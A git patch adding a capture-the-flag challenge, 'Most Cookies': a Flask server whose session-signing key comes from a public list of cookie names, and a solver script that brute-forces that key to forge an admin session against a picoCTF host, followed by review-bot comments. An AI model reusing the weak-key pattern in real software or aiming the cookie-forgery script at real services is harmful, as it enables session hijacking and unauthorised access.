From 4196849359a311feba4f4ae59be50561810a9602 Mon Sep 17 00:00:00 2001
From: Maxime Vorwerk
Date: Thu, 13 Jun 2024 16:18:20 +0200
Subject: [PATCH] most cookies
---
most_cookies/server.py | 58 ++++++++++++++++++++++++++++++++++++++++++
most_cookies/sol.py | 22 ++++++++++++++++
2 files changed, 80 insertions(+)
create mode 100755 most_cookies/server.py
create mode 100755 most_cookies/sol.py
diff --git a/most_cookies/server.py b/most_cookies/server.py
new file mode 100755
index 0000000..aff347f
--- /dev/null
+++ b/most_cookies/server.py
@@ -0,0 +1,58 @@
+from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session
+import random
+app = Flask(__name__)
+flag_value = open("./flag").read().rstrip()
+title = "Most Cookies"
+cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
+app.secret_key = random.choice(cookie_names)
+
+@app.route("/")
+def main():
+ if session.get("very_auth"):
+ check = session["very_auth"]
+ if check == "blank":
+ return render_template("index.html", title=title)
+ else:
+ return make_response(redirect("/display"))
+ else:
+ resp = make_response(redirect("/"))
+ session["very_auth"] = "blank"
+ return resp
+
+@app.route("/search", methods=["GET", "POST"])
+def search():
+ if "name" in request.form and request.form["name"] in cookie_names:
+ resp = make_response(redirect("/display"))
+ session["very_auth"] = request.form["name"]
+ return resp
+ else:
+ message = "That doesn't appear to be a valid cookie."
+ category = "danger"
+ flash(message, category)
+ resp = make_response(redirect("/"))
+ session["very_auth"] = "blank"
+ return resp
+
+@app.route("/reset")
+def reset():
+ resp = make_response(redirect("/"))
+ session.pop("very_auth", None)
+ return resp
+
+@app.route("/display", methods=["GET"])
+def flag():
+ if session.get("very_auth"):
+ check = session["very_auth"]
+ if check == "admin":
+ resp = make_response(render_template("flag.html", value=flag_value, title=title))
+ return resp
+ flash("That is a cookie! 
Not very special though...", "success")
+ return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
+ else:
+ resp = make_response(redirect("/"))
+ session["very_auth"] = "blank"
+ return resp
+
+if __name__ == "__main__":
+ app.run()
+
diff --git a/most_cookies/sol.py b/most_cookies/sol.py
new file mode 100755
index 0000000..bc00810
--- /dev/null
+++ b/most_cookies/sol.py
@@ -0,0 +1,22 @@
+#!/home/maxime/.pyvenv/bin/python3
+from tqdm import tqdm
+import requests
+import hashlib
+from itsdangerous import URLSafeTimedSerializer, Signer
+
+key_list = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
+
+cookie_given_b64 = "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Zmr-Hg.EZmO2K5if1NGsQEXrC2ii1PhJmE"
+cookie_base_value = {"very_auth":"admin"}
+
+for key in tqdm(key_list):
+ cookie_signature = URLSafeTimedSerializer(key, salt="cookie-session", signer_kwargs={"key_derivation": "hmac", "digest_method": hashlib.sha1}).dumps(cookie_base_value)
+ tqdm.write(cookie_signature)
+ cookie = {"session": cookie_signature}
+ r = requests.get("http://mercury.picoctf.net:53700/display", cookies=cookie, allow_redirects=False)
+ if "picoCTF{" in r.text:
+ for line in r.text.splitlines():
+ if "picoCTF{" in line:
+ tqdm.write(line)
+ exit()
+
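Review bot: In most_cookies/server.py, `app.secret_key = random.choice(cookie_names)` draws the session-signing key from a 28-item list that sits in the same file, so the signature on the Flask session cookie gives no real integrity guarantee. The `check == "admin"` branch in `flag()` then makes its only authorization decision on that client-held value. If this is the intentionally weak challenge server, a comment above the assignment would stop it being copied as a pattern, e.g. `# INTENTIONALLY WEAK (CTF): signing key comes from a public 28-item list; never do this in a real app`. In a real service the key should be high-entropy and kept out of the source, e.g. `app.secret_key = secrets.token_bytes(32)` or a value loaded from the environment, with the role looked up server-side rather than read from the cookie. Separately, `open("./flag").read()` never closes the file; a `with open("./flag") as f:` block would.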
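Review bot: In most_cookies/sol.py the shebang `#!/home/maxime/.pyvenv/bin/python3` ties the script to one user's virtualenv and commits a local username; `#!/usr/bin/env python3` is the portable form. `Signer` and `cookie_given_b64` are never used in the visible lines and can be dropped, and `key_list` duplicates `cookie_names` from server.py, so the two copies can drift apart. The `requests.get(...)` call has no `timeout=`, so a stalled connection hangs the loop indefinitely; adding `timeout=10` would bound it.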